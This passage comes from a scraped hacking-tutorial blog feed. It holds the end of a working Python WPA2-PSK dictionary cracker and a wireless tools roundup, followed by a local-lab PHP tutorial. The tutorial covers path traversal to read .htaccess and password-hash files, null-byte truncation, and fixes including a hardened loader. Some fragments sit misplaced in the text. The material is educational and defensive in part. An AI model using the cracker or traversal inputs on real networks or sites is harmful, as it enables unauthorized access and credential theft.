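    The SSID is the salt, which is why CloudCracker asks for the network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: expand the PMK with the two MAC addresses and the two nonces into a 64-byte PTK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 * 20 bytes >= 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame
    with the MIC field zeroed, truncated to 16 bytes.  WPA/TKIP (version 1) uses HMAC-MD5."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal 4-way-handshake message 2 (client -> AP): EAPOL header plus an RSN key
    descriptor carrying the SNonce and the MIC.  Constructed for the demo."""
    key_info = 0x010A  # descriptor version 2, pairwise key, MIC present
    body = struct.pack("!BHHQ", 2, key_info, 16, 1)  # type RSN, key info, key length, replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack("!H", 0)
    return struct.pack("!BBH", 2, 3, len(body)) + body  # EAPOL version 2, type EAPOL-Key


def crack_psk(handshake: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """Recompute PMK -> PTK -> MIC for each candidate until the captured MIC matches."""
    ssid = handshake["ssid"].decode()
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8..63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        kck = ptk[:16]  # the first 128 bits of the PTK are the key confirmation key
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def make_sample_handshake(passphrase: str = "hunter2hunter2", ssid: str = "OpenTechnation") -> Dict[str, bytes]:
    """Construct what a cracker normally pulls from a capture: the SSID from the beacon,
    the ANonce from message 1 and the SNonce plus MIC from message 2 (all made up here)."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = build_eapol_msg2(snonce)
    mic = eapol_mic(ptk[:16], frame)
    return {"ssid": ssid.encode(), "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol": frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:], "mic": mic}


if __name__ == "__main__":
    hs = make_sample_handshake()
    print(crack_psk(hs, ["password", "letmein", "hunter2hunter2"]))
```

<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Every candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is the whole reason GPU crackers such as Pyrit exist, and because the SSID is baked into that step a PMK table built for one network name is useless against another.</div>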
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Final words</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In this post I added twenty working wireless cracking tools that are free or open source. You can use them to test whether a wireless network you are allowed to assess can be accessed without knowing its password. Most of the tools can crack wireless network passwords, but the cracking time varies with the password's length and complexity. A few of them do not crack anything directly, but the packet capture and analysis they provide (for example capturing the WPA handshake) is what the cracking tools work on.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I recommend using these tools for learning purposes only. We do not encourage illegal activity. Accessing a wireless network without authorization is a cyber-crime, so do not put yourself at risk.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you work in network security, you should know these tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I tried my best to cover the most popular wireless hacking tools. If you have any suggestions, comment below.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-48659979318687049272016-01-07T14:34:00.000+05:302016-01-07T14:34:36.260+05:30Website hacking Part-II : Path Traversal, usage of Delimiters, and Information Disclosure attack<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://techworm.vijayprabhu.netdna-cdn.com/wp-content/uploads/2014/07/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://techworm.vijayprabhu.netdna-cdn.com/wp-content/uploads/2014/07/Untitled.png" height="320" width="640" /></a></div>
<span style="background-color: white; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; line-height: 25.9px;">To view Part I of this article, please visit: </span><span style="color: #474747; font-family: Montserrat, sans-serif;"><span style="font-size: 14px; line-height: 25.9px;"><a href="http://opentechnation.blogspot.in/2016/01/website-hacking-part-i-using-hydra.html" target="_blank">http://opentechnation.blogspot.in/2016/01/website-hacking-part-i-using-hydra.html</a></span></span><br />
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In this part we briefly introduce path traversal, the use of delimiters, and information disclosure attacks.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We are going to present simple solutions to simplified problems involving the attacks.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Content</h1>
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Exercise 8: Path Traversal</h2>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; margin-left: 36pt; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure : A simple webpage in which you choose an article and view it</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The website (index.php) in the PathTraversal folder contains a simple form which submits to the same page through the GET request method. Once a choice of article has been made and “View article” has been clicked, the following PHP code executes:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><?php
//If the article GET parameter is set
if (isset($_GET["article"])) {
// Create a div block and fill it with the contents from the file in the GET value.
echo "<div id='article'>" . file_get_contents($_GET["article"]) . "</div>";
}
?>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The result is the following URL: http://localhost/2/PathTraversal/?article=1.htm</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The page loads whichever file is named in the article GET parameter, with no check on what that name is. The parameter is produced by this form field:</div>
<pre class="brush: xml; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><select name="article" required=""></select></pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
And the values are also directly given through the HTML code (the value attribute):</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Domain Slamming</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Legitimate users browse the site through the interface it provides, but with the code as it is we can open many files the site owner does not want us to see, simply by tampering with the URL parameter: file_get_contents() accepts any path the web server's user can read. Many websites have config directories where they store important data; let's see if you can reach one.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Tasks</h3>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em 54pt; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Go back one directory and open openme.txt by changing the URL parameters.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
We assume that the config folder cannot be opened directly in the browser (only the local server can read it) and that you do not know which files it contains. First, check whether the directory exists.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack2.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
</li>
</ol>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The directory exists, and the 401 response tells us that HTTP authentication is in place. Your task is to find the username and the hashed password for the folder without running any brute-force or dictionary attack against the login.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Spoiler (Task 2)</h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If HTTP Basic authentication protects a directory on an Apache server, it is usually configured in an .htaccess file inside that directory (an AuthType, AuthUserFile and Require block). Apache never serves .htaccess to a browser, but the path traversal vulnerability of the article viewer reads files with PHP, not through the web server's URL handling, so we can open it anyway.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack3.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: Viewing the .htaccess file from the article viewer page</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We request <a href="http://localhost/2/PathTraversal/?article=config/.htaccess" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://localhost/2/PathTraversal/?article=config/.htaccess</span></a> and the file tells us the path of the password file (the AuthUserFile directive) and the user that is required to view the folder (Require user). Note that this request contains no “../” at all: the file sits in a subdirectory of the article folder, so a fix that only blocks “..” would not have stopped it.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We type the path to the userlist.htpasswd file and get all usernames and passwords:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #32281e; font-family: inherit; font-size: 14pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">tomburrows:$apr1$ZF.78h2N$zhAaP2AY6VwxuELizJAwg.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now the username is known, which greatly reduces our cracking time. HTTPAuth stores the passwords with UNIX's "CRYPT" function, a "one way" method: the stored value cannot be turned back into the password, it can only be guessed against.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Using path traversal, we can also go back several directories and browse to the <span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">php.ini</em></span> and other important configuration files as well.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
A sample solution to our path traversal vulnerability</h3>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><?php
// If the article GET parameter is set
if (isset($_GET["article"])) {
    // Remove any "/" and "." characters from the GET parameter's value, as they can be used for path traversal
    $article = str_replace(array("/", "."), "", $_GET["article"]);
    // If the file does not exist, print a custom error.
    if (!file_exists($article . ".htm")) {
        echo "<h1>The article does not exist!</h1>";
    }
    else {
        // If and only if the file exists, echo out its contents:
        // create a div block and fill it with the contents of the file named in the GET value,
        // with a mandatory file extension of .htm appended to the name.
        echo "<div id='article'>" . file_get_contents($article . ".htm") . "</div>";
    }
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The change in the HTML form is that we no longer put the full file name in the option tags' values; we use only the article's name without its extension, so only .htm files can be served.</div>
<pre class="brush: xml; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""> Keyloggers: How They Work and More
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Firstly, checking if the file exists and echoing it out only if it exists prevents another attack – that of information disclosure.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack4.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A PHP warning is thrown if we deliberately request a non-existent file. Of course, another way to resolve such information disclosure issues is to turn off display_errors in the php.ini file (this is the most desirable setting if the site is live anyway).</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
With the above mentioned code we get a clean and neat error that the article does not exist, along with prevention of any path traversal attempts.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack5.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: We now receive an error when we try to go back one directory and open the openme.txt file</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Note: in old editions of PHP (older than 5.5.3) you could use the null byte marker (\0) to end the string abruptly and pass your own file extension in place of the “.htm” one in our solution code.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
if (!file_exists($article . ".htm")) could be exploited in older versions of PHP by typing:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="http://localhost/2/PathTraversal/?article=accounts.txt%20" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://localhost/2/PathTraversal/?article=accounts.txt </span></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Which is equivalent to:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
“accounts.txt\0.htm” forcing the server to ignore the .htm part of the string.</div>
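As an added example (not code from the article), here is a stricter version of the article loader that relies on an allow-list of characters and a realpath check instead of stripping characters; the function name, the articles directory and the sample inputs are assumptions:

```php
<?php
// Added example, not from the original article. Function name, ARTICLE_DIR and
// the sample names below are assumptions made for this illustration.

declare(strict_types=1);

const ARTICLE_DIR = __DIR__ . '/articles';   // assumed location of the .htm files

/**
 * Returns the absolute path of the article file to serve, or null if the
 * requested name must be rejected or the article does not exist.
 */
function resolveArticlePath(string $requested, string $baseDir = ARTICLE_DIR): ?string
{
    // 1. Allow-list: only letters, digits, dash and underscore, 1 to 64 characters.
    //    This rejects "/", "\", "." and the null byte in one step, so the
    //    "accounts.txt\0.htm" truncation of old PHP versions has nothing to work with.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. The extension is appended by the server, never taken from the client.
    $candidate = $baseDir . DIRECTORY_SEPARATOR . $requested . '.htm';

    // 3. Defence in depth: resolve symlinks and ".." and confirm the real path is
    //    still inside the base directory before the file is read.
    $realBase = realpath($baseDir);
    $realFile = realpath($candidate);
    if ($realBase === false || $realFile === false) {
        return null;   // base directory or article missing: same generic outcome
    }
    if (strncmp($realFile, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
        return null;   // resolved outside the articles directory
    }
    return $realFile;
}

// Request handler: one generic message for "rejected" and "not found", so the
// response does not reveal which check failed or how the filesystem is laid out.
if (isset($_GET['article'])) {
    $file = resolveArticlePath((string) $_GET['article']);
    if ($file === null) {
        echo "<h1>The article does not exist!</h1>";
    } else {
        echo "<div id='article'>" . file_get_contents($file) . "</div>";
    }
}

// Constructed inputs to exercise the checks from the command line.
if (PHP_SAPI === 'cli') {
    $samples = ['keyloggers', '../Delimiters/users', 'config/.htaccess', "accounts.txt\0"];
    foreach ($samples as $name) {
        printf("%-24s => %s\n", addcslashes($name, "\0"),
               resolveArticlePath($name) ?? 'rejected or missing');
    }
}
```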
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Exercise 9: Information disclosure</h2>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack6.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: Comment page</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
For this exercise, I have created a working but problematic comments page which looks similar to a chat. You have to write a comment, and then you view all the comments up to now. The comments are stored in a .txt file rather than in a database and there is one PHP file that creates new comments and one that displays them on the screen.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><?php
// index.php: server-side code
$path = "comments/";
if ($_SERVER["REQUEST_METHOD"] === "POST") {
    include("add_comment.php");
}
?>

<?php
// add_comment.php
// Read the current contents of the comments file
$comments = file_get_contents($path . "comments.txt");
// Collect the submitted comment fields into an array
$newcomment = [];
$newcomment[] = $_POST["name"];
$newcomment[] = $_POST["topic"];
$newcomment[] = $_POST["message"];
// Convert to a string, using ":" as the delimiter between fields
$newcomment = implode(":", $newcomment);
// Write the old comments plus the new one back to the file
$comments_w = fopen($path . "comments.txt", 'w');
fwrite($comments_w, $comments . "\n" . $newcomment . ":");
fclose($comments_w);
// Show all comments
include($path . "view_comments.php");
?>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack7.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
